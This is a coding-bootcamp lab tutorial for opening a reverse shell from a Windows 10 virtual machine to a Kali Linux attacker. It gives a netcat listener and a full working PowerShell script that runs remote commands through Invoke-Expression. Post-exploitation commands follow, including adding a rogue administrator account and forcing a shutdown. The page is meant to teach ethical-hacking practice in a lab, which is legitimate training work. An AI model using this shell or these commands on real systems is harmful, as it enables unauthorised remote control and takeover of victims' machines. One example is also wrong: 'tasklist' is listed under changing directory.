Self-paced

Explore our extensive collection of courses designed to help you master various subjects and skills. Whether you're a beginner or an advanced learner, there's something here for everyone.

Bootcamp

Learn live

Join us for our free workshops, webinars, and other events to learn more about our programs and get started on your journey to becoming a developer.

Upcoming live events

Learning library

For all the self-taught geeks out there, here is our content library with most of the learning materials we have produced throughout the years.

It makes sense to start learning by reading and watching videos about fundamentals and how things work.

Search from all Lessons


LoginGet Started

Register to 4Geeks

← Back to Projects

Reverse shell and remote remote hacking a Windows machine

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Before you start...

We need you! These exercises are created and maintained in collaboration with people like you. If you find any errors or typos, please contribute and/or report them.

🌱 How to Start This Project

This exercise aims to utilize Windows CMD commands in the context of a remote connection, simulating a remote hacking attack. This tutorial will help you establish a reverse shell from a Windows 10 machine to a Kali Linux machine, executing a series of commands to gather critical information from the Windows system. All of this will be done in a controlled environment, using virtual machines, and will focus on the post-exploitation phase of an ethical attack.

Requirements

  • Attacker Machine (Kali Linux):
    • Required Software: Netcat (pre-installed on Kali Linux)
  • Target Machine (Windows 10):
    • Access to PowerShell and permission to run scripts

Both virtual machines must be configured with the bridged adapter option so they can communicate over the local network.

📝 Instructions

  1. Network Configuration: Verify that both machines can communicate using the ping command from Kali to Windows and vice versa.

  2. Establish the connection with Netcat on the Kali Linux machine (Attacker). Open a terminal and listen on a specific port (in this case, port 4444) using Netcat:

1nc -lvnp 4444

This will set up a listener on the Kali machine, waiting for a connection from Windows.

  1. Open PowerShell on the Windows 10 machine (Target) and execute the following script to establish the reverse shell:
1 $client = New-Object System.Net.Sockets.TCPClient("IP-de-Kali", 4444); 2 $stream = $client.GetStream(); 3 $reader = New-Object System.IO.StreamReader($stream); 4 $writer = New-Object System.IO.StreamWriter($stream); 5 $writer.AutoFlush = $true; 6 7 while ($true) { 8 $data = $reader.ReadLine(); 9 10 11 if ($data -eq "exit") { break } 12 13 try { 14 $result = Invoke-Expression $data 2>&1 | Out-String; 15 $writer.WriteLine($result); 16 } catch { 17 $writer.WriteLine("Error: $_"); 18 } 19 20 $writer.Flush(); 21 }

Note: Remember to replace "IP-of-Kali" with the IP address of your Kali Linux machine.

imagen

With the script running on Windows, you can now send commands from Kali through the Netcat session you initiated. Here are some useful commands to interact with the Windows machine:

imagen 1

Basic Windows Commands:

  • List files in the current directory:
1dir
  • Get system information:
1systeminfo

imagen 2

  • Get network configuration::
1ipconfig

imagen 3

  • List running processes:
1tasklist

Commands for Detailed Information:

imagen 4

  • View system information:

    1hostname
  • List users on the system:

    1net user
  • View active network connections::

    1netstat -an

Commands for Navigating the File System:

  • Change directory::
    1tasklist
  • Create a file or directory::
    1mkdir C:\TestFolder

Administrative Commands (if you have privileges):

  • Shut down or restart the system::
    1shutdown /s /t 0 # Apagar 2shutdown /r /t 0 # Reiniciar
  • Add an administrator user::
    1net user nuevo_usuario contraseña /add 2net localgroup Administradores nuevo_usuario /add

    Research more commands to practice..

End the Session

  • Esto hará que el bucle en PowerShell termine y cierre la conexión.
    1exit

imagen 5

Contributors

Thanks to these amazing people (emoji key):

  1. Rosinni Rodriguez (rosinni) contribution: (build-tutorial) ✅, (documentation) 📖

  2. Alejandro Sanchez (alesanchezr), contribution: (bug reports) 🐛

This project follows the all-contributors specification. Contributions of any kind are welcome!

This and other exercises are used to learn to code by students at 4Geeks Academy Coding Bootcamp led by Alejandro Sánchez and many other contributors. Learn more about our Programming Courses to become a Full Stack Developer, or our Data Science Bootcamp. You can also dive into cybersecurity with our Cybersecurity Bootcamp.

Signup and get access to similar projects

We will use it to give you access to your account.
Already have an account? Login here.

By signing up, you agree to the Terms and conditions and Privacy policy.

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Signup and get access to similar projects

We will use it to give you access to your account.
Already have an account? Login here.

By signing up, you agree to the Terms and conditions and Privacy policy.

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Difficulty

  • intermediate

Average duration

2 hrs

Technologies